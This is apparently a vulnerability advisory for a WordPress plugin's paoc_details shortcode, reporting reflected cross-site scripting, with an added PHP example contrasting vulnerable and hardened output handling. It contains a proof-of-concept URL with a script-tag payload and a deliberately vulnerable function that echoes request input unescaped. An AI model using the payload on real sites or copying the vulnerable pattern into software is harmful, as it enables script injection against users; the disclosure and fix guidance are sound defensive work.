The plugin does not sanitise and escape a parameter before outputting it back in a frontend page, leading to Reflected Cross-Site Scripting.
On a post/page where the [paoc_details display="key_xxx"] shortcode is embedded, append the following payload to the URL: ?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E
e.g.: https://example.com/2022/06/10/hello/?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E
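
The missing sanitise-and-escape step, shown as an added example in plain PHP; this is not the plugin's code. The function names, the CSS class, and the assumption that display="key_xxx" selects the query parameter xxx are hypothetical, inferred from the shortcode and URL above.

```php
<?php
// Added illustration, not the plugin's source. All example_* names are hypothetical.

// Assumption: display="key_xxx" means "show the query parameter named xxx".
function example_param_name(array $atts): string {
    $display = $atts['display'] ?? '';
    return strncmp($display, 'key_', 4) === 0 ? substr($display, 4) : '';
}

// Vulnerable pattern: the request value is concatenated into HTML unchanged,
// so markup in the query string becomes markup in the page.
function example_details_vulnerable(array $atts, array $query): string {
    $value = $query[example_param_name($atts)] ?? '';
    return '<span class="example-detail">' . $value . '</span>';
}

// Hardened pattern: sanitise on input, escape on output.
function example_details_hardened(array $atts, array $query): string {
    $value = $query[example_param_name($atts)] ?? '';
    if (!is_string($value)) {
        $value = '';                       // reject array input such as ?xxx[]=1
    }
    // Sanitise: drop tags and control characters, cap the length.
    // (WordPress equivalent: sanitize_text_field( wp_unslash( ... ) ).)
    $value = strip_tags($value);
    $value = (string) preg_replace('/[\x00-\x1F\x7F]/', '', $value);
    $value = substr($value, 0, 200);
    // Escape for the HTML text context; this is the control that stops the
    // reflection even if sanitising misses something.
    // (WordPress equivalent: esc_html().)
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<span class="example-detail">' . $safe . '</span>';
}

// Constructed input: the advisory's payload after URL decoding.
$atts  = ['display' => 'key_xxx'];
$query = ['xxx' => '11111<script>alert(/XSS/)</script>'];

echo example_details_vulnerable($atts, $query), PHP_EOL; // script tag reflected as markup
echo example_details_hardened($atts, $query), PHP_EOL;   // inert text only
```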